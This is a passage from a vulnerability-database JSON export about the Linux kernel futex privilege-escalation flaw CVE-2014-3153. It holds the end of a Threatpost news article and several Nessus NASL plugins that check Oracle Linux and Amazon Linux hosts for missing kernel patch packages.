[Chrome](<http://threatpost.com/pinkiepie-strikes-again-compromises-google-chrome-pwnium-contest-hack-box-101012>) and [Chrome OS ](<http://threatpost.com/google-serves-half-slice-pwnium-cash-pinkie-pie-031913/77639>)\u2013 many of them sandbox exploits \u2013 at both Pwnium and Pwn2Own competitions over the last few years.\n\nAnother issue (CVE-2014-3144/CVE-2014-3145), wherein a local user could also cause a DoS situation via BPF instructions, was also fixed yesterday.\n\nDebian is encouraging 
Linux users to upgrade their packages and points out that the issue has been fixed in the stable distribution, version 3.2.57-3+deb7u2, and will be fixed in the unstable distribution soon.\n\nA bug similar to the futex one \u2013 [one that apparently existed for five years](<http://threatpost.com/five-year-old-security-vulnerability-patched-in-linux-kernel/106104>) \u2013 was patched last month in Linux kernel. A problem with the \u201cn_tty_write function\u201d could have let local users cause denial of service attacks, gain privileges or run malicious code.\n", "modified": "2014-06-06T17:40:34", "published": "2014-06-06T13:40:34", "id": "THREATPOST:B4267D45B883F6975BE2834CBA5C5B48", "href": "https://threatpost.com/debian-urging-users-patch-linux-kernel-flaw/106516/", "type": "threatpost", "title": "Pinkie Pie Linux Kernel Patch Available", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T12:49:27", "description": "Description of changes:\n\n[2.6.39-400.215.2.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918614] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918614] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918614] {CVE-2014-3153}\n- futex: Forbid uaddr1 == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153} {CVE-2014-3153}", "edition": 21, "published": "2014-06-09T00:00:00", "title": "Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3038)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "modified": "2014-06-09T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", 
"p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2014-3038.NASL", "href": "https://www.tenable.com/plugins/nessus/74377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3038.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74377);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-3153\");\n script_bugtraq_id(67906);\n\n script_name(english:\"Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3038)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.215.2.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918614] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918614] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918614] {CVE-2014-3153}\n- futex: Forbid uaddr1 == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153} {CVE-2014-3153}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-June/004175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-June/004176.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-3153\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2014-3038\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-2.6.39-400.215.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-2.6.39-400.215.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-devel-2.6.39-400.215.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-devel-2.6.39-400.215.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-doc-2.6.39-400.215.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", 
rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-firmware-2.6.39-400.215.2.el5uek\")) flag++;\n\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.215.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.215.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.215.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.215.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.215.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.215.2.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:49:27", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-35.1.1.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918552] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918552] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918552] {CVE-2014-3153}\n- futex: Forbid uaddr == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 
18918552] {CVE-2014-3153} {CVE-2014-3153}", "edition": 21, "published": "2014-06-09T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2014-3037)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "modified": "2014-06-09T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-35.1.1.el6uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:dtrace-modules-headers", "p-cpe:/a:oracle:linux:dtrace-modules-provider-headers", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2014-3037.NASL", "href": "https://www.tenable.com/plugins/nessus/74376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3037.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74376);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-3153\");\n script_bugtraq_id(67906);\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2014-3037)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-35.1.1.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918552] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918552] {CVE-2014-3153}\n- futex: Validate atomic 
acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918552] {CVE-2014-3153}\n- futex: Forbid uaddr == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 18918552] {CVE-2014-3153} {CVE-2014-3153}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-June/004174.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-35.1.1.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-provider-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-3153\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2014-3037\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-35.1.1.el6uek-0.4.3-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-headers-0.4.3-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-provider-headers-0.4.3-4.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-35.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-35.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", 
reference:\"kernel-uek-debug-devel-3.8.13-35.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-35.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-35.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-35.1.1.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:18:50", "description": "The futex_requeue function in kernel/futex.c in the Linux kernel\nthrough 3.14.5 does not ensure that calls have two different futex\naddresses, which allows local users to gain privileges via a crafted\nFUTEX_REQUEUE command that facilitates unsafe waiter modification.", "edition": 24, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : kernel (ALAS-2014-363)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:perf-debuginfo", "p-cpe:/a:amazon:linux:kernel-headers", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-363.NASL", "href": "https://www.tenable.com/plugins/nessus/78306", "sourceData": 
"#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-363.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78306);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-3153\");\n script_xref(name:\"ALAS\", value:\"2014-363\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2014-363)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The futex_requeue function in kernel/futex.c in the Linux kernel\nthrough 3.14.5 does not ensure that calls have two different futex\naddresses, which allows local users to gain privileges via a crafted\nFUTEX_REQUEUE command that facilitates unsafe waiter modification.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-363.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update kernel' to update your system. 
You will need to reboot\nyour system in order for the new kernel to be running.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-3.10.42-52.145.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:49:27", "description": "Description of changes:\n\nkernel-uek\n[2.6.32-400.36.2.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918736] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918736] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918736] {CVE-2014-3153}\n- futex: Forbid uaddr1 == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153} {CVE-2014-3153}", "edition": 21, 